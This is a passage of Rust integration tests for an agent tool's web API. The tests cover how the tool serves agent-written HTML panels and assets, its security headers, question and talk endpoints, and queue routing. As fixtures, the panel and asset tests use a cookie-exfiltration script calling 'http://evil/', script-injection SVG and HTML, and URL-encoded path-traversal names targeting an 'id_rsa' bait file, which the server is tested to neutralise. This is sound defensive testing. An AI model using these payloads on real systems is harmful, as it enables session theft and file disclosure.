4686 }
4687
4688 fn panel(fx: &Fixture, html: &str, assets: &[(&str, &[u8])]) -> String {
4694 let store = fx.questions();
4695 let mut q = Question::new(
4696 "20260902-000000-beef".to_owned(),
4697 "land".to_owned(),
4698 "fix".to_owned(),
4699 "Merge this?".to_owned(),
4700 "the diff is in the panel".to_owned(),
4701 vec!["merge".to_owned(), "hold".to_owned()],
4702 );
4703 let staging = fx.home.path().join("staging");
4706 std::fs::create_dir_all(&staging).expect("staging dir");
4707 let sources: Vec<PathBuf> = assets
4708 .iter()
4709 .map(|(name, bytes)| {
4710 let path = staging.join(name);
4711 std::fs::write(&path, bytes).expect("write staged asset");
4712 path
4713 })
4714 .collect();
4715 store
4716 .put_panel(&mut q, html, &sources)
4717 .expect("write the panel");
4718 store.put(&mut q).expect("put question");
4719 q.id
4720 }
4721
4722 fn seed_talk(fx: &Fixture, id: &str, status: &str) -> String {
4731 let store = fx.talks();
4732 std::fs::create_dir_all(store.root()).expect("talks dir");
4733 let seat = serde_json::to_value(crate::agent::SeatState::new("talk", "mock", 7))
4734 .expect("serialize a seat");
4735 let body = serde_json::json!({
4736 "schema": 1,
4737 "id": id,
4738 "repo": "/repo/magi",
4739 "agent": "mock",
4740 "status": status,
4741 "turns": [],
4742 "created_at": Timestamp::now().to_string(),
4743 "updated_at": Timestamp::now().to_string(),
4744 "seat": seat,
4745 });
4746 std::fs::write(store.path_of(id), body.to_string()).expect("write the talk");
4747 store.get(id).expect("the seeded talk has to be readable");
4748 id.to_owned()
4749 }
4750
4751 #[tokio::test]
4752 async fn both_panel_routes_send_the_whole_policy_that_makes_agent_html_safe() {
4753 let fx = Fixture::start().await;
4754 let id = panel(
4755 &fx,
4756 "<h1>Merge?</h1><img src=\"diff.svg\">",
4757 &[("diff.svg", b"<svg xmlns='http://www.w3.org/2000/svg'/>")],
4758 );
4759
4760 for path in [
4761 format!("/api/questions/{id}/panel"),
4762 format!("/api/questions/{id}/asset/diff.svg"),
4763 ] {
4764 let res = fx.get(&path).await;
4765 assert_eq!(res.status, 200, "{path}: {}", res.body);
4766 assert_eq!(
4772 res.header("content-security-policy"),
4773 Some(
4774 "default-src 'none'; img-src 'self' data:; style-src 'unsafe-inline'; \
4775 font-src data:; base-uri 'none'; form-action 'none'; \
4776 frame-ancestors 'self'"
4777 ),
4778 "{path} is the only thing between a hostile panel and the tailnet"
4779 );
4780 assert_eq!(
4781 res.header("x-content-type-options"),
4782 Some("nosniff"),
4783 "{path}: a browser must not re-decide the type we sent"
4784 );
4785 assert_eq!(
4786 res.header("referrer-policy"),
4787 Some("no-referrer"),
4788 "{path}: a panel must not leak the question id off the machine"
4789 );
4790
4791 let pre = fx.head(&path).await;
4796 assert_eq!(pre.status, res.status, "{path}: HEAD must agree with GET");
4797 assert_eq!(
4798 pre.header("content-security-policy"),
4799 res.header("content-security-policy"),
4800 "{path}: the preflight carries the same policy"
4801 );
4802 assert_eq!(
4803 pre.header("content-type"),
4804 res.header("content-type"),
4805 "{path}: the preflight carries the same type"
4806 );
4807 }
4808 }
4809
4810 #[tokio::test]
4811 async fn a_panel_reaches_the_browser_byte_for_byte() {
4812 let fx = Fixture::start().await;
4813 let html = "<h1>Merge?</h1><p>a < b — 変更</p><script>alert(1)</script>";
4818 let id = panel(&fx, html, &[]);
4819
4820 let res = fx.get(&format!("/api/questions/{id}/panel")).await;
4821
4822 assert_eq!(res.status, 200);
4823 assert_eq!(res.bytes, html.as_bytes(), "served verbatim, not sanitised");
4824 assert_eq!(res.header("content-type"), Some("text/html; charset=utf-8"));
4825 assert_eq!(
4826 res.header("content-disposition"),
4827 None,
4828 "the panel itself is rendered in the frame, not downloaded"
4829 );
4830 }
4831
4832 #[tokio::test]
4833 async fn an_svg_asset_is_a_download_and_a_png_is_not() {
4834 let fx = Fixture::start().await;
4835 let svg = b"<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>";
4836 let png = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR".as_slice();
4837 let id = panel(
4838 &fx,
4839 "<img src=\"diff.svg\"><img src=\"shot.png\">",
4840 &[("diff.svg", svg), ("shot.png", png)],
4841 );
4842
4843 let as_svg = fx.get(&format!("/api/questions/{id}/asset/diff.svg")).await;
4844 let as_png = fx.get(&format!("/api/questions/{id}/asset/shot.png")).await;
4845
4846 assert_eq!(as_svg.status, 200);
4847 assert_eq!(as_svg.header("content-type"), Some("image/svg+xml"));
4848 assert_eq!(as_svg.header("content-disposition"), Some("attachment"));
4853
4854 assert_eq!(as_png.status, 200);
4855 assert_eq!(as_png.header("content-type"), Some("image/png"));
4856 assert_eq!(
4857 as_png.header("content-disposition"),
4858 None,
4859 "a raster image has no execution surface, so tapping it still shows it"
4860 );
4861 assert_eq!(as_png.bytes, png, "a binary asset survives the round trip");
4862 }
4863
4864 #[tokio::test]
4865 async fn an_html_asset_is_never_served_as_html() {
4866 let fx = Fixture::start().await;
4867 let id = panel(
4868 &fx,
4869 "<p>see the notes</p>",
4870 &[
4871 (
4872 "notes.html",
4873 b"<script>fetch('http://evil/'+document.cookie)</script>",
4874 ),
4875 ("hook.js", b"fetch('http://evil/')"),
4876 ("data.json", b"{}"),
4877 ("HEADLINE.TXT", b"plain"),
4878 ],
4879 );
4880
4881 for name in ["notes.html", "hook.js", "data.json"] {
4882 let res = fx.get(&format!("/api/questions/{id}/asset/{name}")).await;
4883 assert_eq!(res.status, 200, "{name}: {}", res.body);
4884 assert_eq!(
4889 res.header("content-type"),
4890 Some("application/octet-stream"),
4891 "{name} must not be a type the browser will execute or render"
4892 );
4893 }
4894 let txt = fx
4897 .get(&format!("/api/questions/{id}/asset/HEADLINE.TXT"))
4898 .await;
4899 assert_eq!(
4900 txt.header("content-type"),
4901 Some("text/plain; charset=utf-8")
4902 );
4903 }
4904
4905 #[tokio::test]
4906 async fn no_spelling_of_a_traversing_asset_name_reaches_the_filesystem() {
4907 let fx = Fixture::start().await;
4908 let id = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
4909 std::fs::write(fx.questions().root().join("id_rsa"), b"secret").expect("write the bait");
4913
4914 for encoded in [
4921 "%2e%2e%2fid_rsa",
4922 "..%2fid_rsa",
4923 "..%5cid_rsa",
4924 "%2e%2e%5cid_rsa",
4925 "diff%00.svg",
4926 "..",
4927 ".hidden",
4928 "%2e%2e%2f%2e%2e%2fid_rsa",
4929 ] {
4930 let res = fx
4931 .get(&format!("/api/questions/{id}/asset/{encoded}"))
4932 .await;
4933 assert_eq!(
4934 res.status, 400,
4935 "`{encoded}` has to be refused by name, not looked up: {}",
4936 res.body
4937 );
4938 assert!(res.json()["error"].is_string(), "{}", res.body);
4939 }
4940
4941 for literal in ["../id_rsa", "../../questions/id_rsa", "..%5c../id_rsa"] {
4947 let res = fx
4948 .get(&format!("/api/questions/{id}/asset/{literal}"))
4949 .await;
4950 assert_eq!(
4951 res.status, 404,
4952 "`{literal}` must not match the asset route at all: {}",
4953 res.body
4954 );
4955 }
4956 }
4957
4958 #[tokio::test]
4959 async fn a_missing_panel_and_an_unknown_asset_are_both_json_404s() {
4960 let fx = Fixture::start().await;
4961 let plain = ask(&fx, "Which backend?", &["SQLite"]);
4962 let with_panel = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
4963
4964 let none = fx.get(&format!("/api/questions/{plain}/panel")).await;
4968 assert_eq!(none.status, 404, "{}", none.body);
4969 assert!(none.json()["error"].is_string(), "{}", none.body);
4970 assert_eq!(
4971 fx.head(&format!("/api/questions/{plain}/panel"))
4972 .await
4973 .status,
4974 404,
4975 "the preflight is the only way the client can learn this"
4976 );
4977
4978 let missing = fx
4980 .get(&format!("/api/questions/{with_panel}/asset/absent.png"))
4981 .await;
4982 assert_eq!(missing.status, 404, "{}", missing.body);
4983 assert!(missing.json()["error"].is_string(), "{}", missing.body);
4984
4985 assert_eq!(fx.get("/api/questions/nope/panel").await.status, 404);
4987 assert_eq!(
4988 fx.get("/api/questions/nope/asset/diff.svg").await.status,
4989 404
4990 );
4991 }
4992
4993 #[tokio::test]
4994 async fn a_run_with_an_open_question_reads_as_waiting() {
4995 let fx = Fixture::start().await;
4996 let run = "20260902-000000-beef".to_owned();
4997 write_run(&fx.runs(), &run, RunStatus::Implementing);
4998
4999 let before = fx.get("/api/runs").await.json();
5000 assert_eq!(before[0]["waiting"], false, "{before}");
5001
5002 let store = fx.questions();
5003 let mut q = Question::new(
5004 run.clone(),
5005 "implement".to_owned(),
5006 "impl-A".to_owned(),
5007 "Which backend?".to_owned(),
5008 String::new(),
5009 vec!["SQLite".to_owned()],
5010 );
5011 store.put(&mut q).expect("put");
5012
5013 let during = fx.get("/api/runs").await.json();
5014 assert_eq!(during[0]["waiting"], true, "{during}");
5015
5016 q.answer(Answer::Choice("SQLite".to_owned()))
5019 .expect("answer");
5020 store.put(&mut q).expect("put");
5021 let after = fx.get("/api/runs").await.json();
5022 assert_eq!(after[0]["waiting"], false, "{after}");
5023 }
5024
5025 #[tokio::test]
5026 async fn an_open_question_is_listed_and_counted_by_health() {
5027 let fx = Fixture::start().await;
5028 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
5029
5030 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5031 let listed = fx.get("/api/questions").await.json();
5032 assert_eq!(listed.as_array().expect("array").len(), 1);
5033 assert_eq!(listed[0]["id"], id);
5034 assert_eq!(listed[0]["status"], "open");
5035 assert_eq!(listed[0]["choices"][1], "Redis");
5036 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5039 }
5040
5041 #[tokio::test]
5042 async fn answering_records_the_choice_and_a_second_answer_conflicts() {
5043 let fx = Fixture::start().await;
5044 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5045 let path = format!("/api/questions/{id}/answer");
5046
5047 let res = fx.post(&path, Some(r#"{"choice":"Redis"}"#)).await;
5048 assert_eq!(res.status, 200, "{}", res.body);
5049 let body = res.json();
5050 assert_eq!(body["status"], "answered");
5051 assert_eq!(body["answer"]["choice"], "Redis");
5052
5053 let again = fx.post(&path, Some(r#"{"choice":"SQLite"}"#)).await;
5057 assert_eq!(again.status, 409, "{}", again.body);
5058 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
5059 }
5060
5061 #[tokio::test]
5062 async fn saying_something_appends_a_turn_without_answering() {
5063 let fx = Fixture::start().await;
5064 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5065 let path = format!("/api/questions/{id}/say");
5066
5067 let res = fx
5068 .post(&path, Some(r#"{"body":"why not Postgres?"}"#))
5069 .await;
5070 assert_eq!(res.status, 200, "{}", res.body);
5071 let body = res.json();
5072 assert_eq!(body["status"], "open", "talking back is not a decision");
5073 assert_eq!(body["answer"], Value::Null);
5074 assert_eq!(body["thread"][0]["who"], "operator");
5075 assert_eq!(body["thread"][0]["body"], "why not Postgres?");
5076 assert_eq!(body["waiting_on_agent"], true);
5077 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5079 }
5080
5081 #[tokio::test]
5082 async fn asking_back_clears_the_owner_count_until_the_agent_replies() {
5083 let fx = Fixture::start().await;
5084 let store = fx.questions();
5085 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5086 assert_eq!(
5087 fx.get("/api/health").await.json()["questions_needs_owner"],
5088 1
5089 );
5090
5091 let res = fx
5097 .post(
5098 &format!("/api/questions/{id}/say"),
5099 Some(r#"{"body":"why not Postgres?"}"#),
5100 )
5101 .await;
5102 assert_eq!(res.status, 200, "{}", res.body);
5103 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5104 assert_eq!(
5105 fx.get("/api/health").await.json()["questions_needs_owner"],
5106 0,
5107 "waiting on the agent is not waiting on the owner"
5108 );
5109
5110 let mut q = store.get(&id).expect("get");
5114 q.reply("because SQLite needs no server", vec!["SQLite".to_owned()])
5115 .expect("reply");
5116 store.put(&mut q).expect("put");
5117 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5118 assert_eq!(
5119 fx.get("/api/health").await.json()["questions_needs_owner"],
5120 1,
5121 "the agent's reply is what should light the banner back up"
5122 );
5123 }
5124
5125 #[tokio::test]
5126 async fn saying_something_is_refused_when_empty_answered_or_abandoned() {
5127 let fx = Fixture::start().await;
5128 let store = fx.questions();
5129
5130 let empty_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5131 let res = fx
5132 .post(
5133 &format!("/api/questions/{empty_id}/say"),
5134 Some(r#"{"body":" "}"#),
5135 )
5136 .await;
5137 assert_eq!(res.status, 400, "{}", res.body);
5138
5139 let answered_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5140 let mut answered = store.get(&answered_id).expect("get");
5141 answered
5142 .answer(Answer::Choice("SQLite".to_owned()))
5143 .expect("answer");
5144 store.put(&mut answered).expect("put");
5145 let res = fx
5146 .post(
5147 &format!("/api/questions/{answered_id}/say"),
5148 Some(r#"{"body":"still there?"}"#),
5149 )
5150 .await;
5151 assert_eq!(res.status, 409, "{}", res.body);
5152
5153 let abandoned_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5154 let mut abandoned = store.get(&abandoned_id).expect("get");
5155 abandoned.abandon("timed out");
5156 store.put(&mut abandoned).expect("put");
5157 let res = fx
5158 .post(
5159 &format!("/api/questions/{abandoned_id}/say"),
5160 Some(r#"{"body":"still there?"}"#),
5161 )
5162 .await;
5163 assert_eq!(res.status, 409, "{}", res.body);
5164 }
5165
5166 #[tokio::test]
5167 async fn an_answer_the_question_does_not_offer_is_refused() {
5168 let fx = Fixture::start().await;
5169 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5170 let path = format!("/api/questions/{id}/answer");
5171
5172 for body in [
5173 r#"{"choice":"Postgres"}"#,
5174 r#"{"text":"whatever you think"}"#,
5175 r#"{"choice":"Redis","text":"both"}"#,
5176 r#"{}"#,
5177 ] {
5178 let res = fx.post(&path, Some(body)).await;
5179 assert_eq!(res.status, 400, "{body} should be refused: {}", res.body);
5180 assert!(res.json()["error"].is_string(), "{}", res.body);
5181 }
5182 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5184 }
5185
5186 #[tokio::test]
5187 async fn a_free_text_question_takes_text_and_not_a_choice() {
5188 let fx = Fixture::start().await;
5189 let id = ask(&fx, "What should the flag be called?", &[]);
5190 let path = format!("/api/questions/{id}/answer");
5191
5192 assert_eq!(
5193 fx.post(&path, Some(r#"{"choice":"--json"}"#)).await.status,
5194 400
5195 );
5196 let res = fx.post(&path, Some(r#"{"text":"--json"}"#)).await;
5197 assert_eq!(res.status, 200, "{}", res.body);
5198 assert_eq!(res.json()["answer"]["text"], "--json");
5199 }
5200
5201 #[tokio::test]
5202 async fn an_unknown_question_is_a_json_404() {
5203 let fx = Fixture::start().await;
5204 let res = fx
5205 .post("/api/questions/nope/answer", Some(r#"{"text":"x"}"#))
5206 .await;
5207 assert_eq!(res.status, 404, "{}", res.body);
5208 assert!(res.json()["error"].is_string());
5209 }
5210
5211 #[tokio::test]
5218 async fn a_task_cannot_be_filed_over_the_phone_directly() {
5219 let f = Fixture::start().await;
5220
5221 let res = f
5222 .post(
5223 "/api/queue",
5224 Some(r#"{"instruction":"Add a --json flag to magi list"}"#),
5225 )
5226 .await;
5227
5228 assert_eq!(
5229 res.status, 405,
5230 "POST /api/queue must not be a route: {}",
5231 res.body
5232 );
5233 assert!(
5234 f.queue().list().is_empty(),
5235 "a task filed by a route that does not exist must not reach the disk"
5236 );
5237 assert_eq!(f.get("/api/queue").await.status, 200);
5240 }
5241
5242 fn make_checkout(root: &FsPath, host: &str, owner: &str, repo: &str) {
5244 std::fs::create_dir_all(root.join(host).join(owner).join(repo).join(".git"))
5245 .expect("checkout dir");
5246 }
5247
5248 #[tokio::test]
5249 async fn repos_list_returns_name_and_path_for_every_configured_root() {
5250 let tmp = TempDir::new().expect("tempdir");
5251 let repo = tmp.path().join("repo");
5252 std::fs::create_dir_all(&repo).expect("repo dir");
5253 let root = tmp.path().join("root");
5254 make_checkout(&root, "github.com", "yukimemi", "magi");
5255 std::fs::write(
5256 repo.join("magi.toml"),
5257 format!(
5258 "[repos]\nroots = [{:?}]\n",
5259 root.to_string_lossy().into_owned()
5260 ),
5261 )
5262 .expect("write magi.toml");
5263
5264 let f = Fixture::with_repo(repo).await;
5265 let res = f.get("/api/repos").await;
5266 assert_eq!(res.status, 200, "{}", res.body);
5267 let list = res.json();
5268 let repos = list.as_array().expect("an array");
5269 assert_eq!(repos.len(), 1);
5270 assert_eq!(repos[0]["name"], "yukimemi/magi");
5271 assert!(
5272 repos[0]["path"]
5273 .as_str()
5274 .is_some_and(|p| p.ends_with("magi") || p.contains("magi")),
5275 "{list}"
5276 );
5277 }
5278
5279 #[tokio::test]
5280 async fn repos_list_only_rescans_within_the_ttl_when_asked_to() {
5281 let tmp = TempDir::new().expect("tempdir");
5282 let repo = tmp.path().join("repo");
5283 std::fs::create_dir_all(&repo).expect("repo dir");
5284 let root = tmp.path().join("root");
5285 make_checkout(&root, "github.com", "yukimemi", "magi");
5286 std::fs::write(
5287 repo.join("magi.toml"),
5288 format!(
5289 "[repos]\nroots = [{:?}]\nscan_ttl = 3600\n",
5290 root.to_string_lossy().into_owned()
5291 ),
5292 )
5293 .expect("write magi.toml");
5294
5295 let f = Fixture::with_repo(repo).await;
5296 let first = f.get("/api/repos").await;
5297 assert_eq!(first.json().as_array().map(Vec::len), Some(1));
5298
5299 make_checkout(&root, "github.com", "yukimemi", "rvpm");
5302 let second = f.get("/api/repos").await;
5303 assert_eq!(
5304 second.json().as_array().map(Vec::len),
5305 Some(1),
5306 "a fresh cache must not rescan inside the TTL"
5307 );
5308
5309 let refreshed = f.get("/api/repos?refresh=1").await;
5310 assert_eq!(
5311 refreshed.json().as_array().map(Vec::len),
5312 Some(2),
5313 "an explicit refresh must rescan even inside the TTL"
5314 );
5315 }
5316
5317 const MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && printf ok\"]\n";
5323
5324 async fn talk_fixture() -> (TempDir, PathBuf, Fixture) {
5328 let tmp = TempDir::new().expect("tempdir");
5329 let repo = tmp.path().join("repo");
5330 std::fs::create_dir_all(&repo).expect("repo dir");
5331 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5332 let f = Fixture::with_repo(repo.clone()).await;
5333 (tmp, repo, f)
5334 }
5335
5336 #[tokio::test]
5337 async fn posting_a_talk_with_no_body_opens_one_and_takes_no_turn() {
5338 let (_tmp, _repo, f) = talk_fixture().await;
5339
5340 let opened = f.post("/api/talks", None).await;
5343 assert_eq!(opened.status, 201, "{}", opened.body);
5344 let body = opened.json();
5345 assert_eq!(body["status"], "open");
5346 assert_eq!(
5347 body["turns"].as_array().unwrap().len(),
5348 0,
5349 "opening takes no agent turn: there is nothing yet to answer"
5350 );
5351
5352 let also_opened = f.post("/api/talks", Some("{}")).await;
5354 assert_eq!(also_opened.status, 201, "{}", also_opened.body);
5355
5356 let listed = f.get("/api/talks").await.json();
5357 assert_eq!(listed.as_array().unwrap().len(), 2);
5358 }
5359
5360 #[tokio::test]
5361 async fn talk_detail_lists_the_tasks_it_has_filed_and_stays_open() {
5362 let f = Fixture::start().await;
5363 let talk_id = seed_talk(&f, "20260904-014455-ab12", "open");
5364 let queue = f.queue();
5365 let mut mine = Task::new(
5366 "rename the loader".to_owned(),
5367 "rename the loader".to_owned(),
5368 PathBuf::from("/repo/magi"),
5369 Source::Agent {
5370 run: talk_id.clone(),
5371 node: "chat".to_owned(),
5372 },
5373 );
5374 queue.put(&mut mine).expect("file the task");
5375 let mut theirs = Task::new(
5376 "unrelated".to_owned(),
5377 "unrelated".to_owned(),
5378 PathBuf::from("/repo/magi"),
5379 Source::Human,
5380 );
5381 queue.put(&mut theirs).expect("file the task");
5382
5383 let res = f.get(&format!("/api/talks/{talk_id}")).await;
5384 assert_eq!(res.status, 200, "{}", res.body);
5385 let body = res.json();
5386 assert_eq!(
5387 body["status"], "open",
5388 "filing a task does not close a talk"
5389 );
5390 let tasks = body["tasks"].as_array().expect("tasks array");
5391 assert_eq!(tasks.len(), 1, "only this talk's own task is listed");
5392 assert_eq!(tasks[0]["id"], mine.id);
5393 }
5394
5395 #[tokio::test]
5396 async fn talk_say_records_the_operators_turn_before_the_agents_reply_lands() {
5397 let (_tmp, _repo, f) = talk_fixture().await;
5398 let id = f.post("/api/talks", None).await.json()["id"]
5399 .as_str()
5400 .expect("id")
5401 .to_owned();
5402
5403 let res = f
5404 .post(
5405 &format!("/api/talks/{id}/say"),
5406 Some(r#"{"text":"what does the queue module do?"}"#),
5407 )
5408 .await;
5409 assert_eq!(res.status, 202, "{}", res.body);
5410 let queued = res.json();
5411 let turns = queued["turns"].as_array().expect("turns array");
5412 assert_eq!(
5413 turns.len(),
5414 1,
5415 "the answer reflects only what is on disk the instant it is sent, \
5416 before the agent's turn - which can run for the whole of \
5417 `[graph] timeout_talk` - has a chance to land: {queued}"
5418 );
5419 assert_eq!(turns[0]["who"], "operator");
5420 assert_eq!(turns[0]["body"], "what does the queue module do?");
5421 assert_eq!(
5422 queued["thinking"], true,
5423 "the accepted response exposes the background turn claim: {queued}"
5424 );
5425
5426 let mut turns_after = 1;
5427 for _ in 0..SETTLE_STEPS {
5428 let detail = f.get(&format!("/api/talks/{id}")).await.json();
5429 turns_after = detail["turns"].as_array().expect("turns array").len();
5430 if turns_after == 2 {
5431 break;
5432 }
5433 tokio::time::sleep(Duration::from_millis(10)).await;
5434 }
5435 assert_eq!(turns_after, 2, "the agent's reply eventually lands");
5436 }
5437
5438 #[tokio::test]
5465 async fn a_dropped_handler_future_after_recording_still_gets_an_agent_reply() {
5466 let tmp = TempDir::new().expect("tempdir");
5467 let repo = tmp.path().join("repo");
5468 std::fs::create_dir_all(&repo).expect("repo dir");
5469 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5470 let home = TempDir::new().expect("temp home");
5471 let talks = Talks::at(home.path().join("talks"));
5472 let ui = Arc::new(
5473 Ui::new(
5474 Queue::at(home.path().join("queue")),
5475 Questions::at(home.path().join("questions")),
5476 talks.clone(),
5477 home.path().join("runs"),
5478 home.path().to_path_buf(),
5479 repo.clone(),
5480 )
5481 .with_worktrees_root(home.path().join("wt")),
5482 );
5483 let cfg = config_for(&repo).await.expect("discover config");
5484
5485 for delay in 0..40u32 {
5486 let talk = talk::begin(&talks, &cfg, repo.clone(), None).expect("begin talk");
5487 let id = talk.id.clone();
5488
5489 let handler = tokio::spawn(talk_say(
5490 State(Arc::clone(&ui)),
5491 Path(id.clone()),
5492 Ok(Json(NewTalkTurn {
5493 text: "what does the queue module do?".to_owned(),
5494 attachments: Vec::new(),
5495 })),
5496 ));
5497 tokio::time::sleep(Duration::from_micros(u64::from(delay) * 500)).await;
5498 handler.abort();
5499 let _ = handler.await;
5502
5503 let mut turns = 0;
5504 for _ in 0..SETTLE_STEPS {
5505 if let Ok(fresh) = talks.get(&id) {
5506 turns = fresh.turns.len();
5507 if turns != 1 {
5508 break;
5509 }
5510 }
5511 tokio::time::sleep(Duration::from_millis(10)).await;
5512 }
5513 assert_ne!(
5514 turns, 1,
5515 "delay {delay}: talk {id} recorded the operator's turn but \
5516 the agent never answered - the reply task was never \
5517 started after the handler future was dropped"
5518 );
5519 }
5520 }
5521
5522 #[tokio::test]
5567 async fn a_dropped_handler_future_after_queueing_still_drains_the_draft() {
5568 let tmp = TempDir::new().expect("tempdir");
5569 let repo = tmp.path().join("repo");
5570 std::fs::create_dir_all(&repo).expect("repo dir");
5571 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5572 let home = TempDir::new().expect("temp home");
5573 let talks = Talks::at(home.path().join("talks"));
5574 let ui = Arc::new(
5575 Ui::new(
5576 Queue::at(home.path().join("queue")),
5577 Questions::at(home.path().join("questions")),
5578 talks.clone(),
5579 home.path().join("runs"),
5580 home.path().to_path_buf(),
5581 repo.clone(),
5582 )
5583 .with_worktrees_root(home.path().join("wt")),
5584 );
5585 let cfg = config_for(&repo).await.expect("discover config");
5586
5587 for attempt in 0..3u32 {
5588 let talk = talk::begin(&talks, &cfg, repo.clone(), None).expect("begin talk");
5589 let id = talk.id.clone();
5590 let turn_guard = ui
5593 .begin_talk_turn(&id)
5594 .expect("claim the turn")
5595 .expect("a fresh talk owes nobody a turn");
5596
5597 let (reached_tx, reached_rx) = tokio::sync::oneshot::channel();
5598 let (release_tx, release_rx) = std::sync::mpsc::channel();
5599 ui.set_busy_queue_gate(BusyQueueGate {
5600 reached: reached_tx,
5601 release: release_rx,
5602 });
5603
5604 let handler = tokio::spawn(talk_say(
5605 State(Arc::clone(&ui)),
5606 Path(id.clone()),
5607 Ok(Json(NewTalkTurn {
5608 text: "what does the queue module do?".to_owned(),
5609 attachments: Vec::new(),
5610 })),
5611 ));
5612
5613 tokio::time::timeout(Duration::from_secs(5), reached_rx)
5618 .await
5619 .unwrap_or_else(|_| {
5620 panic!(
5621 "attempt {attempt}: talk {id} never reached the busy branch's queue write"
5622 )
5623 })
5624 .expect("the busy branch dropped the gate without using it");
5625
5626 let running = talks.get(&id).expect("reload talk");
5633 drain_loop(running, talks.clone(), cfg.clone(), id.clone(), turn_guard).await;
5634
5635 handler.abort();
5639 let _ = handler.await;
5640
5641 let _ = release_tx.send(());
5647
5648 let mut fresh = talks.get(&id).expect("reload talk");
5651 for _ in 0..SETTLE_STEPS {
5652 if fresh.pending.is_empty() && fresh.turns.len() == 2 {
5653 break;
5654 }
5655 tokio::time::sleep(Duration::from_millis(10)).await;
5656 fresh = talks.get(&id).expect("reload talk");
5657 }
5658 assert!(
5659 fresh.pending.is_empty() && fresh.turns.len() == 2,
5660 "attempt {attempt}: talk {id} left the operator's text queued \
5661 with no drainer - the reclaimed turn was dropped along with \
5662 the handler future (pending {:?}, {} turns)",
5663 fresh.pending,
5664 fresh.turns.len()
5665 );
5666 }
5667 }
5668
5669 #[tokio::test]
5670 async fn editing_a_recovered_pending_draft_restarts_its_drain_once() {
5671 let (_tmp, _repo, f) = talk_fixture().await;
5672 let id = f.post("/api/talks", None).await.json()["id"]
5673 .as_str()
5674 .expect("id")
5675 .to_owned();
5676 let store = f.talks();
5677 let mut recovered = store.get(&id).expect("opened talk");
5678 talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
5679 .expect("persist pending draft without a live turn");
5680
5681 let edited = f
5682 .post(
5683 &format!("/api/talks/{id}/pending/edit"),
5684 Some(r#"{"text":"corrected","expected_text":"saved before restart","expected_attachments":[]}"#),
5685 )
5686 .await;
5687 assert_eq!(edited.status, 200, "{}", edited.body);
5688 assert!(edited.json()["thinking"].as_bool().unwrap());
5689
5690 let mut detail = f.get(&format!("/api/talks/{id}")).await.json();
5691 for _ in 0..SETTLE_STEPS {
5692 if detail["turns"].as_array().expect("turns").len() == 2 {
5693 break;
5694 }
5695 tokio::time::sleep(Duration::from_millis(10)).await;
5696 detail = f.get(&format!("/api/talks/{id}")).await.json();
5697 }
5698 let turns = detail["turns"].as_array().expect("turns");
5699 assert_eq!(
5700 turns.len(),
5701 2,
5702 "the recovered draft must run once: {detail}"
5703 );
5704 assert_eq!(turns[0]["body"], "corrected");
5705 assert_eq!(detail["pending"], "");
5706 }
5707
5708 #[tokio::test]
5709 async fn recovered_pending_requires_explicit_resume_and_duplicate_resume_runs_once() {
5710 let tmp = TempDir::new().expect("tempdir");
5711 let repo = tmp.path().join("repo");
5712 std::fs::create_dir_all(&repo).expect("repo dir");
5713 std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
5714 let f = Fixture::with_repo(repo).await;
5715 let id = f.post("/api/talks", None).await.json()["id"]
5716 .as_str()
5717 .expect("id")
5718 .to_owned();
5719 let store = f.talks();
5720 let mut recovered = store.get(&id).expect("opened talk");
5721 talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
5722 .expect("persist pending draft without a live turn");
5723
5724 let refused = f
5725 .post(
5726 &format!("/api/talks/{id}/say"),
5727 Some(r#"{"text":"new message"}"#),
5728 )
5729 .await;
5730 assert_eq!(refused.status, 409, "{}", refused.body);
5731 assert!(refused.body.contains("resume"), "{}", refused.body);
5732 let saved = store.get(&id).expect("draft remains after refusal");
5733 assert!(saved.turns.is_empty());
5734 assert_eq!(saved.pending, "saved before restart");
5735
5736 let say_path = format!("/api/talks/{id}/say");
5737 let (first, second) = tokio::join!(
5738 f.post(&say_path, Some(r#"{"text":"concurrent one"}"#)),
5739 f.post(&say_path, Some(r#"{"text":"concurrent two"}"#)),
5740 );
5741 assert_eq!(first.status, 409, "{}", first.body);
5742 assert_eq!(second.status, 409, "{}", second.body);
5743 let saved = store
5744 .get(&id)
5745 .expect("draft remains after concurrent refusals");
5746 assert!(saved.turns.is_empty());
5747 assert_eq!(saved.pending, "saved before restart");
5748
5749 let resumed = f
5750 .post(&format!("/api/talks/{id}/pending/resume"), None)
5751 .await;
5752 assert_eq!(resumed.status, 202, "{}", resumed.body);
5753 let duplicate = f
5754 .post(&format!("/api/talks/{id}/pending/resume"), None)
5755 .await;
5756 assert_eq!(duplicate.status, 409, "{}", duplicate.body);
5757
5758 for _ in 0..SETTLE_STEPS {
5759 if store.get(&id).expect("talk").turns.len() == 2 {
5760 break;
5761 }
5762 tokio::time::sleep(Duration::from_millis(10)).await;
5763 }
5764 let finished = store.get(&id).expect("finished talk");
5765 assert_eq!(finished.turns.len(), 2, "{finished:?}");
5766 assert_eq!(finished.turns[0].body, "saved before restart");
5767 assert!(finished.pending.is_empty());
5768 }
